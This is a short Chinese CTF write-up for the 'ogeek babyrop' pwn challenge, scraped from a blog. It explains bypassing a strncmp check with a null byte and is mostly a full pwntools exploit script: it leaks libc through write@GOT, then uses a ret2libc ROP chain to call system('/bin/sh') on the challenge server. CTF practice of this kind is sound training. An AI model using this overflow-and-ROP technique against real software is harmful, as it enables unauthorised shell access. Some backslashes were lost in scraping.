zoukankan      html  css  js  c++  java
  • ogeek babyrop

    拖入ida

     

     

    先用strncmp使一个随机数与输入比对,这里可以用x00跳过strncmp

    然后read()中的a1是我们输入x00后的值

    写exp

    from pwn import *
    
    sh=remote('node1.buuoj.cn',28560)
    #sh=process('/home/harmonica/Desktop/oppo/rop/babyrop')
    elf=ELF('/home/harmonica/Desktop/oppo/rop/babyrop')
    libc=ELF('/home/harmonica/Desktop/oppo/rop/libc-2.23.so')
    
    bin_sh_off=0x0015902b
    system_off=0x0003a940
    
    write_plt = elf.plt['write']
    write_got = elf.got['write']
    main=0x08048825
    
    payload='x00'+'xff'*7
    sh.sendline(payload)
    sh.recvuntil('Correct
    ')
    
    payload='a'*0xe7+'bbbb'+p32(write_plt)+p32(main)+p32(1)+p32(write_got)
    sh.sendline(payload)
    
    write_addr = u32(sh.recv()[0:4])
    libcbase = write_addr - libc.sym['write']
    log.success("libcbase: "+hex(libcbase))
    
    system_addr = libcbase + system_off
    binsh_addr = libcbase + bin_sh_off
    
    payload='x00'+'xff'*7
    sh.sendline(payload)
    sh.recvuntil('Correct
    ')
    
    payload='a'*0xe7+'bbbb'+p32(system_addr)+'bbbb'+p32(binsh_addr)
    sh.sendline(payload)
    
    sh.interactive()

    得到flag

  • 相关阅读:
    HDU 3537
    POJ 1175
    POJ 1021 人品题
    POJ 2068
    POJ 2608
    POJ 2960
    poj 1635
    ustc 1117
    ural 1468
    数字游戏
  • 原文地址:https://www.cnblogs.com/harmonica11/p/11568166.html
Copyright © 2011-2022 走看看